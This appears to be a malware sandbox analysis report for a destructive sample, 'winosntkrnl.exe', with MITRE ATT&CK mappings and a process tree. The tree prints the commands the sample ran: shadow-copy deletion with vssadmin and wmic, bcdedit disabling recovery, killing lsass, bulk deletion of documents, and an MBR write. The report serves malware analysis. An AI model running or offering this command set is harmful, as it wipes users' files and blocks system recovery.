Set value (int)	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{298D6691-C406-11EA-A298-DEA12C1060B9} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	winosntkrnl.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1768	icacls.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2016	vssadmin.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
240	winosntkrnl.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1776	taskkill.exe
Token: SeDebugPrivilege	360	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeShutdownPrivilege	1496	shutdown.exe
Token: SeRemoteShutdownPrivilege	1496	shutdown.exe

Checks whether UAC is enabled 11 IoCs

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	IEXPLORE.EXE
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iexplore.exe

C:\Users\Admin\AppData\Local\Temp\winosntkrnl.exe
"C:\Users\Admin\AppData\Local\Temp\winosntkrnl.exe"
1⤵
- Suspicious use of WriteProcessMemory
- Writes to the Master Boot Record (MBR)
- Suspicious use of FindShellTrayWindow
PID:240
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c echo off
  2⤵
  PID:1860
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Windows\SysWOW64\icacls.exe
    icacls . /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:1768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im explorer.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1752
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im explorer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im regedit.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:568
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im regedit.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im lsass.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:804
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im lsass.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c shutdown /r /t 150 /c "trolololololololol"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\SysWOW64\shutdown.exe
    shutdown /r /t 150 /c "trolololololololol"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c RD /s /q %systemdrive%\$Recycle.bin
  2⤵
  PID:1988
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c RD /s /q %UserProfile%Documents
  2⤵
  PID:1964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c MD %UserProfile%Documents
  2⤵
  PID:1944
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c RD /s /q C:WindowsMinidump
  2⤵
  PID:1984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c vssadmin delete shadows /all /quiet
  2⤵
  PID:1008
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic shadowcopy delete
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    PID:2000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
  2⤵
  PID:2044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cd %UserProfile%
  2⤵
  PID:1468
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c DEL /s /q /f *.DOC *.DOCX *.xls *.xlsx *.png *.txt *.pdf *.jpeg *.png *.bmp *.rtf *.ppt *.pptx *.odf *.tif *.jpg *.svg *.htm *.html
  2⤵
  PID:1504
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://www.youtube.com/watch?v=oHg5SJYRHA0
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:996
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:996 CREDAT:275457 /prefetch:2
    3⤵
    - Checks whether UAC is enabled
    PID:1532
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1804
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1804 CREDAT:275457 /prefetch:2
    3⤵
    PID:1836
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1876
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1876 CREDAT:275457 /prefetch:2
    3⤵
    - Checks whether UAC is enabled
    PID:1664
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1744
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1744 CREDAT:275457 /prefetch:2
    3⤵
    PID:1428
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1668
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1668 CREDAT:275457 /prefetch:2
    3⤵
    - Checks whether UAC is enabled
    PID:1756
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:360
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:360 CREDAT:275457 /prefetch:2
    3⤵
    PID:500
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1920
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1920 CREDAT:275457 /prefetch:2
    3⤵
    PID:1608
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" https://youtu.be/sTSA_sWGM44?t=106
  2⤵
  - Suspicious use of SetWindowsHookEx
  - Modifies Internet Explorer settings
  - Checks whether UAC is enabled
  PID:1972
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1972 CREDAT:275457 /prefetch:2
    3⤵
    PID:2016

C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t You are about to be logged off -m Windows has encountered a critical problem and will restart automatically in one minute. Please save your work now. -a 3
1⤵
PID:1500

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

T1067

Privilege Escalation

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads